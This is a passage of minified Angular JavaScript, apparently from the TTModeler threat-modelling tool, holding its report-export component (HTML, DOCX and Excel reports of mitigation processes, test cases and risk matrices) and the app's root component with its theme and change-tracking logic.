Ne=0;Ne<Re.length;Ne++)if((null===(n=Re[Ne].ProcessStack)||void 0===n?void 0:n.GetChildrenFlat().length)>0){Fe>1&&this.createSubSubHeading(Re[Ne].Name);const et=this.viewContainerRef.createComponent(gT);et.instance.stack=Re[Ne].ProcessStack,et.instance.elRef.nativeElement.style.color="black",yield new Promise(Ze=>setTimeout(()=>{pe(et.instance.elRef.nativeElement),Ze()},10)),yield this.getComponentImage(et,this.docWidth,[20,50,0,25]).then(Ze=>{this.createImage(Ze[0],Ze[1],Ze[2]),T(Re[Ne].ProcessStack.ID)})}if(this.Project.GetMitigationProcesses().length>0&&(this.createSubHeading(this.translate.instant("general.MitigationProcesses")),this.createParagraph(this.translate.instant("report.mitigationProcessExplanation")),this.createParagraph(""),this.Project.GetMitigationProcesses().forEach(Ne=>{var et,ut,Ze;this.createBoldParagraph(Ne.GetLongName()),Ne.MitigationProcessState&&this.createParagraph(this.translate.instant("properties.Status")+": "+this.translate.instant(C2.ToString(Ne.MitigationProcessState))+" ("+this.translate.instant("general.Progress")+": "+Ne.Progress.toFixed(0)+"%)"),(null===(et=Ne.Description)||void 0===et?void 0:et.length)>0&&this.createParagraph(this.translate.instant("properties.Description")+": "+Ne.Description),(null===(ut=Ne.Tasks)||void 0===ut?void 0:ut.length)>0&&(this.createParagraph(this.translate.instant("general.Tasks")),this.createUL(Ne.Tasks.map(yt=>this.translate.instant(yt.IsChecked?"general.Done":"general.DoneNot")+": "+yt.Note))),(null===(Ze=Ne.Notes)||void 0===Ze?void 0:Ze.length)>0&&(this.createParagraph(this.translate.instant("general.Notes")),this.createUL(Ne.Notes.map(yt=>new Date(Number(yt.Date)).toLocaleDateString()+" - "+yt.Author+": "+yt.Note))),Ne.Countermeasures.length>0&&this.createParagraph(this.translate.instant("general.Countermeasures")+": "+Ne.Countermeasures.map(yt=>yt.GetLongName()).join(", ")),this.createParagraph("")})),this.Project.HasTesting&&this.ShowTestCases){this.createSubHeading(this.translate.instant("general.TestCases")),this.createParagraph(this.translate.instant("report.testCaseExplanation")),this.createParagraph("");const Ne=this.Project.GetTesting().TestCases;for(let et=0;et<Ne.length;et++){const ut=Ne[et];this.createBoldParagraph(ut.GetLongName()),this.createParagraph(this.translate.instant("properties.Status")+": "+this.translate.instant(Qg.ToString(ut.Status))),(null===(r=ut.Description)||void 0===r?void 0:r.length)>0&&this.createParagraph(this.translate.instant("properties.Description")+": "+ut.Description),ut.Version&&this.createParagraph(this.translate.instant("pages.modeling.testcase.verison")+": "+ut.Version),ut.PreConditions.length>0&&(this.createParagraph(this.translate.instant("properties.PreConditions")),this.createUL(ut.PreConditions)),ut.Steps.length>0&&(this.createParagraph(this.translate.instant("properties.Steps")),this.createOL(ut.Steps)),ut.TestData.length>0&&(this.createParagraph(this.translate.instant("properties.TestData")),this.createUL(ut.TestData)),ut.Summary.length>0&&(this.createParagraph(this.translate.instant("properties.Summary")),this.createUL(ut.Summary.map(Ze=>Ze.Note))),ut.Images.length>0&&this.createParagraph(this.translate.instant("general.Images"));for(let Ze=0;Ze<ut.Images.length;Ze++){const yt=ut.Images[Ze];yield(St=>x2(this,void 0,void 0,function*(){const Nt=new Image;return Nt.src=St,yield Nt.decode(),Nt}))(yt).then(St=>{this.createImage(yt,St.naturalWidth,St.naturalHeight),this.createParagraph("")})}1==ut.LinkedElements.length&&this.createParagraph(this.translate.instant("properties.LinkedElements")+": "+ut.LinkedElements[0].GetProperty("Name")+" in "+ut.GetViewOfLinkedElement(ut.LinkedElements[0]).Name),ut.LinkedElements.length>1&&(this.createParagraph(this.translate.instant("properties.LinkedElements")),this.createUL(ut.LinkedElements.map(Ze=>Ze.GetProperty("Name")+" in "+ut.GetViewOfLinkedElement(Ze).Name))),1==ut.LinkedScenarios.length&&this.createParagraph(this.translate.instant("properties.LinkedScenarios")+": "+ut.LinkedScenarios[0].GetProperty("Name")+" in "+this.Project.GetView(ut.LinkedScenarios[0].ViewID).Name),ut.LinkedScenarios.length>1&&(this.createParagraph(this.translate.instant("properties.LinkedScenarios")),this.createUL(ut.LinkedScenarios.map(Ze=>Ze.GetLongName()+" in "+this.Project.GetView(Ze.ViewID).Name))),1==ut.LinkedMeasures.length&&this.createParagraph(this.translate.instant("properties.LinkedMeasures")+": "+ut.LinkedMeasures[0].GetProperty("Name")+" in "+this.Project.GetView(ut.LinkedMeasures[0].ViewID).Name),ut.LinkedMeasures.length>1&&(this.createParagraph(this.translate.instant("properties.LinkedMeasures")),this.createUL(ut.LinkedMeasures.map(Ze=>Ze.GetLongName()+" in "+this.Project.GetView(Ze.ViewID).Name))),this.createParagraph("")}}Array.from(this.content.nativeElement.children).forEach(Ne=>this.content.nativeElement.removeChild(Ne)),this.htmlBuffer.forEach(Ne=>this.content.nativeElement.appendChild(Ne)),this.IsReportGenerated=!0,this.IsReportGenerating=!1}))})}SaveHTML(){let e="<!DOCTYPE html>\n<html>\n<head><title>TTModeler Report: "+this.Project.GetProjectName()+"</title></head><body>";e+=this.content.nativeElement.innerHTML,e+="</body></html>";const i=new Blob([e]);(0,yM.saveAs)(i,this.Project.Name.replace(".ttmp",".html"))}SaveDOCX(){const e=new ua.Document({numbering:{config:[{levels:[{level:0,format:ua.LevelFormat.DECIMAL,text:"%1.",alignment:ua.AlignmentType.START,style:{paragraph:{indent:{left:(0,ua.convertInchesToTwip)(.5),hanging:(0,ua.convertInchesToTwip)(.25)}}}}],reference:"my-numbering"}]},creator:this.dataService.UserDisplayName,description:this.dataService.Project.Description,title:this.dataService.Project.GetProjectName(),styles:{default:{document:{run:{font:"Calibri"}},heading1:{paragraph:{spacing:{before:120}}},heading2:{paragraph:{spacing:{before:120}}},heading3:{paragraph:{spacing:{before:120}}}}},sections:[{children:this.docxBuffer}]});ua.Packer.toBuffer(e).then(i=>{const n=new Blob([i]);(0,yM.saveAs)(n,this.Project.Name.replace(".ttmp",".docx"))})}SaveExcel(){return x2(this,void 0,void 0,function*(){const e=[];this.exportTemplates.forEach(i=>{const n=[],r=[];i.Template.map(c=>c.name).forEach(c=>r.push({value:c,fontWeight:"bold"})),n.push(r),i.GetRowData(this.translate).forEach(c=>{const d=[];c.forEach(T=>d.push({value:T})),n.push(d)}),e.push(n)}),yield $Z(e,{fileName:this.dataService.Project.Name.replace(".ttmp",".xlsx"),sheets:this.exportTemplates.map(i=>i.Name)})})}AddTemplate(){this.selectedExportTemplate=this.dataService.Project.CreateExportTemplate()}DeleteTemplate(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(e==this.selectedExportTemplate&&(this.selectedExportTemplate=null),this.dataService.Project.DeleteExportTemplate(e))})}initializeReportHTML(){return new Promise(e=>{this.readFile("./assets/icons/favicon.192x192.png").then(i=>{const n=this.createHtmlTitle("TTModeler Report "),r=document.createElement("img");r.src=i,r.style.width="50px",r.style.marginLeft="20px",r.style.verticalAlign="middle",r.alt="logo",n.appendChild(r),this.htmlBuffer=[n],this.htmlBuffer.push(this.createHtmlParagraph(this.translate.instant("report.for"))),this.htmlBuffer.push(this.createHtmlTitle(this.Project.GetProjectName())),this.htmlBuffer.push(this.createHtmlParagraph((new Date).toLocaleDateString()+", Version "+this.Project.UserVersion)),e()})})}initializeReportDOCX(){return new Promise(e=>{this.readFile("./assets/icons/favicon.192x192.png").then(i=>{this.docxBuffer=[new ua.Paragraph({text:"TTModeler Report     ",heading:ua.HeadingLevel.TITLE,children:[new ua.ImageRun({data:i,transformation:{width:50,height:50}})]}),this.createDocxParagraph(this.translate.instant("report.for")),this.createDocxTitle(this.Project.GetProjectName()),this.createParagraph(""),this.createDocxParagraph(this.GetDate().toLocaleDateString()+", Version "+this.Project.UserVersion),this.createParagraph("")],e()})})}createUL(e){this.createDocxUL(e),this.createHtmlUL(e)}createDocxUL(e){e.forEach(i=>{const n=new ua.Paragraph({text:i,bullet:{level:0}});this.docxBuffer.push(n)})}createHtmlUL(e){const i=document.createElement("ul");e.forEach(n=>{i.appendChild(this.createHtmlElement("li",n))}),this.htmlBuffer.push(i)}createOL(e){this.createDocxOL(e),this.createHtmlOL(e)}createDocxOL(e){e.forEach(i=>{const n=new ua.Paragraph({text:i,numbering:{reference:"my-numbering",level:0}});this.docxBuffer.push(n)})}createHtmlOL(e){const i=document.createElement("ol");e.forEach(n=>{i.appendChild(this.createHtmlElement("li",n))}),this.htmlBuffer.push(i)}createTitle(e){this.docxBuffer.push(this.createDocxTitle(e)),this.htmlBuffer.push(this.createHtmlTitle(e))}createDocxTitle(e){return new ua.Paragraph({text:e,heading:ua.HeadingLevel.TITLE})}createHtmlTitle(e){return this.createHtmlElement("h1",e)}createHeading(e){this.docxBuffer.push(this.createDocxHeading(e)),this.htmlBuffer.push(this.createHtmlHeading(e))}createDocxHeading(e){return new ua.Paragraph({text:e,heading:ua.HeadingLevel.HEADING_1})}createHtmlHeading(e){return this.createHtmlElement("h2",e)}createSubHeading(e){this.docxBuffer.push(this.createDocxSubHeading(e)),this.htmlBuffer.push(this.createHtmlSubHeading(e))}createDocxSubHeading(e){return new ua.Paragraph({text:e,heading:ua.HeadingLevel.HEADING_2})}createHtmlSubHeading(e){return this.createHtmlElement("h3",e)}createSubSubHeading(e){this.docxBuffer.push(this.createDocxSubSubHeading(e)),this.htmlBuffer.push(this.createHtmlSubSubHeading(e))}createDocxSubSubHeading(e){return new ua.Paragraph({text:e,heading:ua.HeadingLevel.HEADING_3})}createHtmlSubSubHeading(e){return this.createHtmlElement("h4",e)}createSubSubSubHeading(e){this.docxBuffer.push(this.createDocxSubSubSubHeading(e)),this.htmlBuffer.push(this.createHtmlSubSubSubHeading(e))}createDocxSubSubSubHeading(e){return new ua.Paragraph({text:e,heading:ua.HeadingLevel.HEADING_4})}createHtmlSubSubSubHeading(e){return this.createHtmlElement("h5",e)}createParagraph(e){this.docxBuffer.push(this.createDocxParagraph(e)),this.htmlBuffer.push(this.createHtmlParagraph(e))}createDocxParagraph(e){return new ua.Paragraph({text:e})}createHtmlParagraph(e){return this.createHtmlElement("p",e)}createBoldParagraph(e){this.docxBuffer.push(this.createDocxBoldParagraph(e)),this.htmlBuffer.push(this.createHtmlBoldParagraph(e))}createDocxBoldParagraph(e){return new ua.Paragraph({children:[new ua.TextRun({text:e,bold:!0})]})}createHtmlBoldParagraph(e){const i=this.createHtmlElement("strong",e),n=document.createElement("p");return n.appendChild(i),n}createLink(e,i){this.docxBuffer.push(this.createDocxLink(e,i)),this.htmlBuffer.push(this.createHtmlLink(e,i))}createDocxLink(e,i){return new ua.Paragraph({children:[new ua.ExternalHyperlink({children:[new ua.TextRun({text:e,style:"Hyperlink"})],link:i})]})}createHtmlLink(e,i){const n=this.createHtmlElement("a",e);return n.href=i,n.target="_blank",n}createTable(e,i){this.docxBuffer.push(this.createDocxTable(e,i)),this.htmlBuffer.push(this.createHTMLTable(e,i))}createDocxTable(e,i){const n=[];let r=new ua.TableRow({children:[]});return e.forEach(d=>{r.addChildElement(new ua.TableCell({children:[new ua.Paragraph({children:[new ua.TextRun({text:d.toString(),bold:!0})],alignment:d==e[0]?ua.AlignmentType.LEFT:ua.AlignmentType.CENTER})],verticalAlign:ua.VerticalAlign.CENTER}))}),n.push(r),i.forEach(d=>{r=new ua.TableRow({children:[]}),d.forEach(T=>{r.addChildElement(new ua.TableCell({children:[new ua.Paragraph({text:T.toString(),alignment:T==d[0]?ua.AlignmentType.LEFT:ua.AlignmentType.CENTER})]}))}),n.push(r)}),new ua.Table({rows:n,borders:ua.TableBorders.NONE})}createHTMLTable(e,i){const n=document.createElement("table"),r=document.createElement("thead");let c=document.createElement("tr");e.forEach(T=>c.appendChild(this.createHtmlElement("th",T))),c.children.item(0).style.textAlign="left",Array.from(c.children).filter((T,k)=>k>=1).forEach(T=>{T.style.padding="0 5px"}),r.appendChild(c),n.appendChild(r);const d=document.createElement("tbody");return i.forEach(T=>{c=document.createElement("tr"),T.forEach(k=>c.appendChild(this.createHtmlElement("td",k))),Array.from(c.children).filter((k,q)=>q>=1).forEach(k=>{const q=k;q.style.textAlign="center",q.style.padding="0 5px"}),d.appendChild(c)}),n.appendChild(d),n}createRiskTable(){this.docxBuffer.push(this.createDocxRiskTable()),this.htmlBuffer.push(this.createHTMLRiskTable())}createDocxRiskTable(){const e=(T,k=!1,q=ua.TextDirection.LEFT_TO_RIGHT_TOP_TO_BOTTOM,Y=1,te=1,pe="#FFFFFF")=>new ua.TableCell({children:[new ua.Paragraph({children:[new ua.TextRun({text:T.toString(),bold:k})],alignment:ua.AlignmentType.CENTER})],shading:{fill:pe,type:ua.ShadingType.CLEAR,color:"auto"},textDirection:q,columnSpan:Y,rowSpan:te}),i=[];let n=new ua.TableRow({children:[]});n.addChildElement(e("")),n.addChildElement(e("")),n.addChildElement(e(this.translate.instant("properties.Severity"),!0,ua.TextDirection.LEFT_TO_RIGHT_TOP_TO_BOTTOM,4)),i.push(n),n=new ua.TableRow({children:[]});let r=["","","Low","Medium","High","Critical"];r.forEach(T=>{n.addChildElement(e(T.length>0?this.translate.instant("properties.threatseverity."+T):""))}),i.push(n),n=new ua.TableRow({children:[]}),n.addChildElement(e(this.translate.instant("general.Likelihood"),!0,ua.TextDirection.BOTTOM_TO_TOP_LEFT_TO_RIGHT,1,3)),r=["High","Medium","High","High","Critical"];let c=["#FFFFFF","#fcff2f","#fe0000","#fe0000","#cb0000"];for(let T=0;T<r.length;T++)n.addChildElement(e(r[T].length>0?this.translate.instant("properties.threatseverity."+r[T]):"",!1,ua.TextDirection.LEFT_TO_RIGHT_TOP_TO_BOTTOM,1,1,c[T]));i.push(n),n=new ua.TableRow({children:[]}),r=["Medium","Low","Medium","High","Critical"],c=["#FFFFFF","#34ff34","#fcff2f","#fe0000","#cb0000"];for(let T=0;T<r.length;T++)n.addChildElement(e(r[T].length>0?this.translate.instant("properties.threatseverity."+r[T]):"",!1,ua.TextDirection.LEFT_TO_RIGHT_TOP_TO_BOTTOM,1,1,c[T]));i.push(n),n=new ua.TableRow({children:[]}),r=["Low","Low","Medium","Medium","High"],c=["#FFFFFF","#34ff34","#fcff2f","#fcff2f","#fe0000"];for(let T=0;T<r.length;T++)n.addChildElement(e(r[T].length>0?this.translate.instant("properties.threatseverity."+r[T]):"",!1,ua.TextDirection.LEFT_TO_RIGHT_TOP_TO_BOTTOM,1,1,c[T]));return i.push(n),new ua.Table({rows:i,borders:ua.TableBorders.NONE})}createHTMLRiskTable(){const e=document.createElement("table");e.style.borderSpacing="5px";const i=document.createElement("tbody");let n=document.createElement("tr");n.appendChild(this.createHtmlElement("td","")),n.appendChild(this.createHtmlElement("td",""));let r=this.createHtmlElement("td","");r.appendChild(this.createHtmlElement("strong",this.translate.instant("properties.Severity"))),r.colSpan=4,n.appendChild(r),i.appendChild(n),n=document.createElement("tr");let c=["","","Low","Medium","High","Critical"];c.forEach(T=>{let k=this.createHtmlElement("td",T.length>0?this.translate.instant("properties.threatseverity."+T):"");n.appendChild(k)}),i.appendChild(n),n=document.createElement("tr"),r=this.createHtmlElement("td",""),r.appendChild(this.createHtmlElement("strong",this.translate.instant("general.Likelihood"))),r.rowSpan=3,n.appendChild(r),c=["High","Medium","High","High","Critical"];let d=["transparent","#fcff2f","#fe0000","#fe0000","#cb0000"];for(let T=0;T<c.length;T++){let k=this.createHtmlElement("td",this.translate.instant("properties.threatseverity."+c[T]));k.style.backgroundColor=d[T],n.appendChild(k)}i.appendChild(n),n=document.createElement("tr"),c=["Medium","Low","Medium","High","Critical"],d=["transparent","#34ff34","#fcff2f","#fe0000","#cb0000"];for(let T=0;T<c.length;T++){let k=this.createHtmlElement("td",this.translate.instant("properties.threatseverity."+c[T]));k.style.backgroundColor=d[T],n.appendChild(k)}i.appendChild(n),n=document.createElement("tr"),c=["Low","Low","Medium","Medium","High"],d=["transparent","#34ff34","#fcff2f","#fcff2f","#fe0000"];for(let T=0;T<c.length;T++){let k=this.createHtmlElement("td",this.translate.instant("properties.threatseverity."+c[T]));k.style.backgroundColor=d[T],n.appendChild(k)}return i.appendChild(n),Array.from(i.children).forEach(T=>{Array.from(T.children).forEach(k=>k.style.textAlign="center")}),e.appendChild(i),e}createImage(e,i,n){this.docxBuffer.push(this.createDocxImage(e,i,n)),this.htmlBuffer.push(this.createHtmlImage(e))}createDocxImage(e,i,n){const c=600>i?1:600/i;return new ua.Paragraph({children:[new ua.ImageRun({data:e,transformation:{width:i*c,height:n*c}})],alignment:ua.AlignmentType.CENTER})}createHtmlImage(e){const i=document.createElement("div"),n=document.createElement("img");return n.src=e,i.appendChild(n),i.style.textAlign="center",i}getComponentImage(e,i,n){return x2(this,void 0,void 0,function*(){const r=document.createElement("div");return r.appendChild(e.instance.elRef.nativeElement),r.style.width=i.toString()+"px",document.body.appendChild(r),yield new Promise(d=>setTimeout(()=>{P2t()(e.instance.elRef.nativeElement,{allowTaint:!0}).then(T=>{let k=T.toDataURL("image/png");const q=new Image;q.src=k,q.onload=()=>{let te=(te=>{const pe=document.createElement("canvas"),Re=pe.getContext("2d");return pe.width=T.width-(n[0]+n[2]),pe.height=T.height-(n[1]+n[3]),Re.drawImage(te,n[0],n[1],T.width-n[0]-n[2],T.height-n[1]-n[3],0,0,pe.width,pe.height),[pe.toDataURL(),pe.width,pe.height]})(q);document.body.removeChild(r),d(te)}})},10))})}createDiagram(e){const i=this.getDiagramImage(e);this.docxBuffer.push(this.createDocxDiagram(i[0],i[1],i[2])),this.htmlBuffer.push(this.createHtmlDiagram(i[0]))}createDocxDiagram(e,i,n){const c=600>i?1:600/i;return new ua.Paragraph({children:[new ua.ImageRun({data:e,transformation:{width:i*c,height:n*c}})]})}createHtmlDiagram(e){const i=document.createElement("img");return i.src=e,i.style.maxWidth=this.docWidth.toString()+"px",i}getDiagramImage(e){const i=ns.FromJSON(JSON.parse(JSON.stringify(e.ToJSON())),this.Project,this.Project.Config),n=this.docWidth,c=document.createElement("div");c.style.width=n.toString()+"px",c.style.height=500..toString()+"px",c.style.pointerEvents="none";let d=new xb(new DOMRectReadOnly(0,0,n,500),null);this.Dia=i instanceof b2?new R7(i,this.dataService,this.theme,this.dialog,this.locStorage,this.translate,i.IsUseCaseDiagram?aa.UseCase:aa.Context):new $T(i,this.dataService,this.theme,this.dialog,this.locStorage,this.translate),this.Dia.OnResized(d,c),this.Dia.PrintMode(this.DiagramShowGrid);const T=this.Dia.FitToCanvas(n);return d=new xb(new DOMRectReadOnly(0,0,n,T[1]+10),null),c.style.height=T[1].toString()+"px",this.Dia.OnResized(d,c,!1),[this.Dia.GetImage(),n,T[1]]}createHtmlElement(e,i){const n=document.createElement(e);return n.textContent=i,n}readFile(e){return new Promise((i,n)=>{this.http.get(e,{responseType:"blob"}).subscribe(r=>{const c=new FileReader;c.onloadend=()=>{var d;i(null===(d=c.result)||void 0===d?void 0:d.toString())},c.readAsDataURL(r)})})}GetDate(){return new Date}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(x5),Ee(Sn),Ee(Wn),Ee(Oo),Ee(op),Ee(_r),Ee(fo))},t.\u0275cmp=Wt({type:t,selectors:[["app-reporting"]],viewQuery:function(e,i){if(1&e&&Mi(hyt,5),2&e){let n;Vt(n=Bt())&&(i.content=n.first)}},decls:40,vars:7,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/reporting",2,"width","100%","height","100%"],[2,"margin","10px"],["preserveContent","",2,"height","100%"],["mat-tab-label",""],["matTabContent",""],[1,"tab-icon"],["mat-raised-button","",3,"disabled","click"],["mat-icon-button","",3,"disabled","matMenuTriggerFor"],["settings","matMenu"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"],["mat-menu-item","",4,"ngIf"],["style","display: inline; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],["mat-raised-button","","color","primary",2,"margin-left","50px",3,"disabled","click"],["mat-raised-button","","color","primary",2,"margin-left","10px",3,"disabled","click"],[2,"margin-top","30px"],[2,"background-color","white","color","black","max-width","210mm","padding","25mm"],["reportcontent",""],["src","./assets/icons/favicon.192x192.png","alt","logo",2,"width","50px","margin-left","20px","vertical-align","middle"],[4,"ngIf"],["mode","indeterminate",2,"display","inline","margin-left","5px",3,"diameter"],[1,"row",2,"margin-bottom","10px"],[1,"column1"],[1,"prop-list","reorder-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],["mat-raised-button","","color","primary",2,"margin-top","10px","left","50%","transform","translateX(-50%)",3,"disabled","click"],[1,"column2"],[3,"template",4,"ngIf"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[3,"template"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),it(6,"app-side-nav",3),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"div",4),s(12,"\n        "),m(13,"h2"),s(14),oe(15,"translate"),u(),s(16,"\n        "),m(17,"mat-tab-group",5),s(18,"\n          "),m(19,"mat-tab"),s(20,"\n            "),ne(21,fyt,5,3,"ng-template",6),s(22,"\n            "),ne(23,Cyt,73,40,"ng-template",7),s(24,"\n          "),u(),s(25,"\n          "),m(26,"mat-tab"),s(27,"\n            "),ne(28,yyt,5,3,"ng-template",6),s(29,"\n            "),ne(30,vyt,33,16,"ng-template",7),s(31,"\n          "),u(),s(32,"\n        "),u(),s(33,"\n      "),u(),s(34,"\n    "),u(),s(35,"\n  "),u(),s(36,"\n  "),it(37,"app-status-bar"),s(38,"\n"),u(),s(39,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),C(5),ke(re(15,5,"side-nav.reporting")))},dependencies:[Zi,Ri,Ta,Ea,oa,_u,gu,Nd,da,qh,V1,Mu,Uh,xl,ts,is,Or,Lr,rc,Xo,qo,po,Pa,Mg,pf,_f,uyt,Xi,T5],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{text-align:center}.tab-icon[_ngcontent-%COMP%]{margin-right:8px}']}),t})()}];let Tyt=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(Ayt),Ms]}),t})(),Eyt=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,ff,Tyt]}),t})();const Dyt=["primary"],xyt=["accent"];function wyt(t,a){1&t&&(m(0,"mat-progress-bar",6),s(1,"\n"),u())}function Iyt(t,a){if(1&t){const e=Ye();m(0,"div",7),s(1,"\n  "),m(2,"div"),s(3),m(4,"button",8),he("click",function(){return be(e),Me(B().OpenReleases())}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon",9),s(8,"open_in_new"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",8),he("click",function(){return be(e),Me(B().CloseVersionInfo())}),oe(12,"translate"),s(13,"\n      "),m(14,"mat-icon",10),s(15,"close"),u(),s(16,"\n    "),u(),s(17,"\n  "),u(),s(18,"\n"),u()}if(2&t){const e=B();ri("background-color",e.theme.Accent),C(3),ct("\n    ",e.GetVersionString(),"\n    "),C(1),at("matTooltip",re(5,5,"general.openInNew")),C(7),at("matTooltip",re(12,7,"general.Close"))}}let Ryt=(()=>{class t{constructor(e,i,n,r,c,d,T,k){this.dataService=e,this.theme=i,this.electronService=n,this.translate=r,this.locStorage=c,this.overlay=d,this.isLoadingService=T,this.kvDiffers=k,this.className="",this.isInitialized=!1,this.translate.setDefaultLang("en"),window.onbeforeunload=q=>this.dataService.OnCloseApp(q)}ngOnInit(){this.isLoading=this.isLoadingService.isLoading$(),this.electronService.isElectron||(document.onkeydown=e=>{e.ctrlKey&&"s"===e.key&&(e.preventDefault(),this.dataService.OnSave())})}ngAfterViewInit(){this.theme.ThemeChanged.subscribe(i=>{const n="darkMode";i?(document.body.classList.add(n),this.overlay.getContainerElement().classList.add(n)):(document.body.classList.remove(n),this.overlay.getContainerElement().classList.remove(n))});let e=this.locStorage.Get(si.LANGUAGE);null!=e&&this.translate.use(e),setTimeout(()=>{this.theme.Primary=getComputedStyle(this.primary.nativeElement).color,this.theme.Accent=getComputedStyle(this.accent.nativeElement).color,this.dataService.ProjectChanged.subscribe(()=>this.createDiffers()),this.dataService.ConfigChanged.subscribe(()=>this.createDiffers()),this.dataService.ProjectSaved.subscribe(()=>this.createDiffers())},10)}GetVersionString(){return Gi.Format(this.translate.instant("messages.info.versionAvailable"),this.dataService.NewVersionAvailable)}OpenReleases(){window.open("https://github.com/SecSimon/TTM/releases","_blank"),this.CloseVersionInfo()}CloseVersionInfo(){this.dataService.NewVersionAvailable=null}createDiffers(){this.diffs=[],this.configStr=this.projectStr=null,this.isInitialized=!1;let e=this.dataService.Config;null!=e&&(this.configStr=JSON.stringify(e.ToJSON()),this.configID=e.ID);let i=this.dataService.Project;null!=i&&(this.projectStr=JSON.stringify(i.ToJSON()),this.projectID=i.ID,this.createDiffer(i.GetDFDElements(),null,i.DFDElementsChanged),this.createDiffer(i.GetAttackScenarios(),null,i.AttackScenariosChanged),this.createDiffer(i.GetCountermeasures(),null,i.CountermeasuresChanged),this.createDiffer(i.GetMitigationProcesses(),null,i.MitigationProcessesChanged),this.createDiffer(i.GetComponents(),null,i.MyComponentsChanged),this.createDiffer(i.GetComponents(),"threatQuestions"),this.createDiffer(i.GetDevices(),null,null),this.createDiffer(i.GetDiagrams(),null,i.DiagramsChanged),this.createDiffer(i.GetSystemThreats(),null,i.SystemThreatsChanged),this.createDiffer(i.GetThreatActors(),null,i.ThreatActorsChanged),this.createDiffer(i.GetAssetGroups(),null,i.AssetsChanged),this.createDiffer(i.GetMyDatas(),null,i.MyDatasChanged),this.createDiffer(i.GetTestCases(),null,i.TestCasesChanged)),(this.configStr||this.projectStr)&&setTimeout(()=>{t.blockChanges=!0,this.isInitialized=!0,setTimeout(()=>{t.blockChanges=!1},1e3)},500)}createDiffer(e,i,n){let r=this.kvDiffers.find(e).create(),c=new Map,d=new Map;e.forEach(k=>{c[k.ID]=this.kvDiffers.find(i?k.Data[i]:k.Data).create(),d[k.ID]=i?k.Data[i]:k.Data}),this.diffs.push({arrayDiffer:r,differMap:c,objMap:d,sourceArray:e,key:i,event:n})}ngDoCheck(){if(this.configStr)if(this.dataService.Config&&this.configID==this.dataService.Config.ID){if(!this.dataService.Config.FileChanged){let e=JSON.stringify(this.dataService.Config.ToJSON());e!==this.configStr&&(this.configStr=e,this.dataService.Config.FileChanged=!0)}}else this.configStr=null;if(this.projectStr)if(this.dataService.Project&&this.projectID==this.dataService.Project.ID){if(!this.dataService.Project.FileChanged){let e=JSON.stringify(this.dataService.Project.ToJSON());e!==this.projectStr&&(this.projectStr=e,this.dataService.Project.FileChanged=!0)}}else this.projectStr=null;this.isInitialized&&this.diffs.forEach(e=>{let i=e.arrayDiffer.diff(e.sourceArray);i&&(i.forEachAddedItem(n=>{var r;let c=n.currentValue;e.differMap.set(c.ID,this.kvDiffers.find(e.key?c.Data[e.key]:c.Data).create()),e.objMap.set(c.ID,e.key?c.Data[e.key]:c.Data),t.blockChanges||e.event&&(e.event.emit({ID:c.ID,Type:Ja.Added}),null===(r=c.DataChanged)||void 0===r||r.subscribe(d=>e.event.emit({ID:c.ID,Type:d.Type})))}),i.forEachRemovedItem(n=>{let r=n.previousValue;e.differMap.delete(r.ID),e.objMap.delete(r.ID),e.event&&e.event.emit({ID:r.ID,Type:Ja.Removed})})),e.differMap.forEach((n,r)=>{let c=n.diff(e.objMap.get(r));c&&c.forEachChangedItem(d=>{t.blockChanges||e.event&&e.event.emit({ID:r,Type:Ja.Changed})})})})}}return t.blockChanges=!1,t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Oa),Ee(ST),Ee(Sn),Ee(_r),Ee(ob),Ee($G),Ee(f1))},t.\u0275cmp=Wt({type:t,selectors:[["app-root"]],viewQuery:function(e,i){if(1&e&&(Mi(Dyt,5),Mi(xyt,5)),2&e){let n;Vt(n=Bt())&&(i.primary=n.first),Vt(n=Bt())&&(i.accent=n.first)}},hostVars:2,hostBindings:function(e,i){2&e&&_D(i.className)},decls:14,vars:4,consts:[["mode","indeterminate","style","position: absolute; top: 0; z-index: 